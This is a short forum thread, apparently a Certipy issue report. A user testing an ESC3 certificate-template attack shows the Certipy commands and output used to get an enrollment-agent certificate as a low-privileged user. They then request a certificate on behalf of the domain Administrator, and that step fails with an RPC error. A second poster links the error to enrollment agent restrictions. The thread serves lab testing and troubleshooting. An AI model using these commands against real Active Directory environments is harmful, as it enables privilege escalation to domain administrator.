ESC2 & ESC3 vulnerable template 'RPC_E_CALL_COMPLETE' error

[DeserranoJorden]

While trying to test a vulnerable certificate template for ESC2 and ESC3 i ran into an error that I cant explain.

I start by requesting a certificate with the vulnerable template in the name of a low privileged user:

certipy req -username '[email protected]' -password 'passwd' -ca 'Domain CA' -target ADCS.intranet.domain.local -dc-ip 10.0.0.1 -template 'ESC3-test'                 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is [ID]
[*] Got certificate without identification
[*] Certificate has no object SID
[*] Saved certificate and private key to 'low-priv.pfx'

So far so good. Now, when trying to request a new pfx in the name of a higher-privileged user now, I get the following output:

certipy req -username '[email protected]' -password 'passwd' -ca 'Domain CA' -target ADCS.intranet.domain.local -dc-ip 10.0.0.1 -template 'User' -on-behalf-of intranet/Administrator -pfx low-priv.pfx -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'ADCS.intranet.domain.local' at '10.0.0.1'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.0.0.1[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.0.0.1[\pipe\cert]
[-] Got error while trying to request certificate: code: 0x80010117 - RPC_E_CALL_COMPLETE - Call context cannot be accessed after call completed.
[*] Request ID is [ID]
Would you like to save the private key? (y/N) n
[-] Failed to request certificate

Ps. unfortunately, using the web browser instead (-web) was also not an option.

[nurfed1]

I encountered this issue in my lab after enabling enrollment agent restrictions.

I didn't manage to figure out what's going on yet but I noticed that DCOM and Certify are working fine.